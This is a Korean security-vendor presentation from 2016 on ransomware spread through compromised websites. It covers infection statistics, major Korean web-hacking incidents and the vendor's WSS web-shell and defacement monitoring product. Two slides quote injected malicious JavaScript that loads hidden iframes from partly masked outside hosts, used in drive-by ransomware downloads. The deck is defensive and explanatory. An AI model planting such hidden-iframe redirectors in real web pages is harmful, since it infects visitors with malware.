웹사이트를이용한 랜섬웨어공격과대응방안 발표자 : 유엠브이기술김상민상무 2016 년 01 월 27 일
목차 - 랜섬웨어! 웹과만나다. - 웹해킹! 랜섬웨어의은밀한침투 - 웹해킹! 어떻게방어할것인가? - 웹해킹! 보안솔루션소개 - 맺음말
랜섬웨어! 웹과만나다. 랜섬웨어어떻게감염되는가? 2015 년랜섬웨어감염경로별통계 ( 출처 : 한국랜섬웨어침해대응센터 ) [ 3 ]
랜섬웨어! 웹과만나다. 전세계적으로매일 25 만개이상생성되고있는멀웨어는 4 년전에비해 300% 이상증가한수치이며, 악성 URL 은매일 30,000 여개, 즉 2 초마다새롭게발견되고있는것으로, 피해를입은악성 URL 의 80% 가공식적인일반사이트인것으로나타났다. 출처 : 보드나라기사 ( 블루코트자료인용 ) [ 4 ]
랜섬웨어! 웹과만나다. 국내악성 URL 경유지탐지현황 (2015.12) 출처 : KISA 인터넷침해대응센타 [ 5 ]
랜섬웨어! 웹과만나다. 국내업종별악성 URL 경유지탐지현황 (2015.12) 출처 : KISA 인터넷침해대응센타 [ 6 ]
웹해킹! 랜섬웨어의은밀한침투 해킹프로세스 최근해킹의특징은복합적이고지속적으로이루어지고있습니다. 취약점분석 공격시도 취약점스캐너 네트워크취약점 시스템취약점 애플리케이션취약점 방화벽 IDS/IPS 웹방화벽 시스템침입 접근제어 정보위변조 정보유출 웹쉘설치 웹쉘실행 정보위변조 정보유출 위변조탐지 웹쉘탐지 악성코드배포코드탐지 악성코드배포코드삽입 악성코드 PC 다운로드 악성코드실행 악성코드원격제어 ID/PW 탈취 DDOS 공격 시스템침입 고객정보유출 / 변조 해커사용자 (PC) 방어수단 [ 7 ]
웹해킹! 랜섬웨어의은밀한침투 악성 URL 은웹서버를악성코드의경유지로이용하여신종 변종의악성코드를 PC 에대량으로유포하는 URL 또는 IP 주소를말하며, 바이러스, 랜섬웨어, 웜바이러스, 트로이목마등을사용자 PC 에유포하여, 네트워크트래픽발생, 시스템성능저하, 파일암호화, 파일삭제, 개인정보유출, 원격제어등의심각한피해를입힐수있으며, DDoS 공격용좀비 PC 로이용될수있습니다. 악성코드유포서버 개인정보탈취 / 시스템계정정보탈취 / 사용자파일암호화 웹서버 방문자 1 악성코드삽입 DDoS 공격명령 방문자 n [ 8 ]
웹해킹! 랜섬웨어의은밀한침투 악성유포지 URL 을이용한해킹방법 User with vulnerable computer visits compromised web page with invisible IFrame IFrame embedded in page secretly loads another page The page redirects to another page containing an exploit If the exploit succeeds, malware downloads from another server to victim's computer 출처 : MS Security intelligence report [ 9 ]
웹해킹! 랜섬웨어의은밀한침투 악성유포지 URL 을이용한해킹시연 (Download) eval( if (document.cookie.indexof( 'wang ')==-1) { var expires=new Date(); expires.settime(expires.gettime()+12*60*60*1000); document.cookie= 'wang=yes; path=/; expires= '+expires.togmtstring(); <iframe src=http://www.scsxx.co.kr/data/index.html width=100 height=0></iframe>; } ) 웹페이지접속시랜섬웨어악성코드배포지로리다이렉션되어랜섬웨어파일다운로드 C:\WINODWS\ 디렉토리에랜덤문자열로 exe 파일이자동으로생성되어 PC 파일을암호화 [ 10 ]
웹해킹! 랜섬웨어의은밀한침투 악성유포지 URL 을이용한해킹시연 (Drive By Download) [ 취약점 ] 인터넷브라우저 Adobe Reader, Adobe Flash Player JAVA(JRE) 그외 ActiveX 등 document.write("<iframe src='http://211.58.255.xxx/tool/index.html width='60' height='1' frameborder=0></iframe>") 웹페이지접속시취약점사이트로리다이렉션되며자동으로취약점공격코드가실행 C:\WINODWS\ 디렉토리에랜덤문자열로 exe 파일이자동으로생성되어 PC 파일을암호화 [ 11 ]
웹해킹! 랜섬웨어의은밀한침투 랜섬웨어공격의진화? 랜섬웨어보다더한 ` 랜섬웹 ` 비상발행일 2015.02.22 [ 전자신문김인순기자 ] 웹서버에저장된데이터베이스 (DB) 를 암호화해인질로삼고돈을요구하는 랜섬웹 (RansomWeb) 이등장했다. PC 파일을인질삼아돈을요구하는랜섬웨어 에서더발전된형태로주의가요구된다. 랜섬웹공격을당하면웹서비스가중단되는 심각한피해를입을수있다. - 하략 - [ 12 ]
웹해킹! 랜섬웨어의은밀한침투 최근대표적인웹해킹사례 발생시기 업체명 피해사례 해킹원인 2008년 01월 OO인터넷쇼핑몰 1,863만명고객정보유출 웹쉘 2011년 03월 3.3 DDoS 대란 인터넷접속마비 웹쉘및악성URL 2011년 05월 OO금융사 175만명고객정보유출 웹쉘 2011년 07월 OO인터넷포털 3,500만명고객정보유출 악성URL 2012년 05월 교육방송 400만명 ( 추정 ) 고객정보유출 웹쉘 2013 년 03 월 3.20 사이버테러 다수방송사및금융기관시스템파괴및 서비스중단 웹쉘및악성 URL 을이용한보안 Activex 를 가장한악성코드유포 2013 년 06 월 6.25 사이버테러정부기관홈페이지위변조웹쉘, 악성 URL, 홈페이지위변조 2014 년 03 월 부동산거래망해킹의사협회해킹 부동산거래정보 595 만건유출 1,700 만명개인정보유출 웹쉘 [ 13 ]
웹해킹! 랜섬웨어의은밀한침투 웹해킹사례분석 <3.20 사이버테러 > - 악성코드유포진원지및은닉용경유지 49 개확인 - 2012 년 06 월부터해킹진행 - 악성코드 76 종확인 - 1 차 Base64 로인코딩된웹쉘을기사작성웹서버에침투. 백신업데이트서버를장악. 내부업무포탈에악성코드은닉. 내부에서외부로접속후서버관리자 PC 에악성코드삽입. DB 삭제 - 2 차날씨닷컴사이트 - 3 차방송사 ( 웹 => 개발서버 => 내부서버 ) - 4 차대북보수단체홈페이지 * 2013 년 04 월 09 일보안뉴스기사참조 [ 14 ]
웹해킹! 어떻게방어할것인가? 웹서버의보안고도화를통한랜섬웨어통로차단 웹어플리이션 Source Target Web Shell 탐지 악성코드유포코드탐지 위변조탐지 / 방지 Web App. 취약점분석 Web Server Web App. Web Client PC Web Page 해커 웹페이지변경 취약점 웹쉘 Script Page 악성코드유포 HTML Page 악성코드유포 HTML Page 취약점 WAS 장애 / 성능 Web Browser Web Server 취약점분석 취약점 OS Web Server 모니터링 원격관리 OS [ 15 ]
웹해킹! 어떻게방어할것인가? 웹해킹이슈및대응방안 웹해킹의종류웹소스코드취약점홈페이지위변조웹쉘악성URL 설명. OWASP TOP 10 & 국정원 8 대취약점. 소스개발하여적용시점에집중적으로취약점점검. 주기적취약점점검및모의해킹, 점검인력의기술력및경험에의지. 웹취약점및웹쉘을통한해킹. 홈페이지위변조공격은해당기관및기업의이미지에커다란손상. 웹소스취약점또는내부자에의한웹쉘업로드. 웹위변조, 정보유출, 시스템파괴공격에이용됨. 취약점점검으로탐지하기어려움. 웹접속자 ( 고객, 내부직원 ) 의 PC 에악성코드감염. 웹해킹피해확산의주범 소스코드 취약점점검 ( 시큐어코딩 ) 웹쉘 탐지및검역 악성 URL 탐지및검역 홈페이지위변조 탐지및자동복구 웹보안통합관리시스템 [ 16 ]
웹해킹! 방어솔루션소개 웹보안솔루션소개 WSS(Web Server Safeguard) 제품명 WSS (Web Server Safeguard) WSS ShellMonitor ( 쉘모니터 ) WSS ForgeryMonitor ( 포저리모니터 ) 버전 WSS (Web Server Safeguard) v2.5 출시연 / 월 2010 년 05 월 제조사 유엠브이기술 특장점 웹어플리케이션파일의임의생성및변조를실시간으로탐지 ASP, JSP, PHP 등다양한최신웹쉘탐지패턴보유 난독화, 암호화웹쉘에대한 PRE-COMPILE을통한휴리스틱탐지지원 엔터프라이즈환경 ( 대량의웹서버중앙집중관리 ) 에대응하는운영방식제공 서버자원 (CPU, 메모리 ) 제어기능을통한쉘모니터에이전트에의한웹서비스에미치는영향최소화 [ 17 ]
웹해킹! 방어솔루션소개 웹보안솔루션소개 주요기능 WebServer Safeguard 쉘모니터 (ShellMonitor) 포저리모니터 (ForgeryMonitor) 클라우드지원기능 관리기능 (Management) 연동기능 (Linkage) 웹쉘탐지 홈페이지위변조탐지 SCALE IN/OUT 지원 권한관리 ESM / SMS 악성 URL 탐지 홈페이지위변조복원 이력관리 에이전트관리 EMAIL / 문자알림 개인정보탐지 변경파일탐지 ( 웹쉘, 악성 URL) 이벤트중복관리 업데이트관리 형상관리 WAS 설정변경탐지 홈디렉토리자동탐지 홈디렉토리자동찾기 웹취약점관리시스템 URL 관리 기타관리시스템 [ 18 ]
웹해킹! 방어솔루션소개 웹보안솔루션소개 WSS 쉘모니터기능 WSS 쉘모니터 (ShellMonitor) 는웹서버파일시스템의변동을실시간으로인지하여실시간삽입되는웹서버악성코드및악성코드유포지 URL 을여부를즉시검사하고, 관리자에게통보하여검역조치합니다. 웹쉘및악성코드유포지 URL 실시간탐지 / 검역조치 대규모웹서버를위한중앙집중식관리지원및자동업데이트지원 악의적인권한변경에대응하는웹서버설정파일변경탐지 탐지및조치프로세스 웹서버 / WAS 2 탐지보고 1 웹쉘 / 악성 URL 공격 WSS 에이전트 3 조치작업 WSS 관리서버 WSS 매니저 실시간탐지 ESM 연동 SMS, EMAIL 연동 검역 ( 격리 ) 조치 (2 자동 / 4 수동 ) [ 19 ]
웹해킹! 방어솔루션소개 웹보안솔루션소개 WSS 포저리모니터기능 WSS 포저리모니터 (ForgeryMonitor) 는서비스중인홈페이지의위변조발생시실시간으로인지하여무결성원본파일로복원후관리자에게통보합니다. 홈페이지위변조탐지 / 복원 에이전트인증을통한소스코드변경작업지원 변경작업파일에대한웹쉘및악성 URL 검사 탐지및조치프로세스 ID/PW 인증을통한소스변경작업 위변조관리서버 4 복원 DMZ 3 원본파일복원요청 웹서버 /WAS 형상관리서버 인가된사용자 WSS 관리서버 2 변경탐지알림 위변조탐지에이전트 비인가사용자또는해커 1 불법접속 웹서버 /WAS [ 20 ]
맺음말 랜섬웨어방어를개인의문제로접근하기보다는 서비스제공자를포함한사회적, 국가적문제로접근하는인식의전환이필요합니다. Website relationship graph [ 21 ]
감사합니다! A: 서울특별시서초구양재동 316-6 흥아빌딩 2층 T: 02-448-3435 H: http://www.umv.co.kr E: sales@umv.co.kr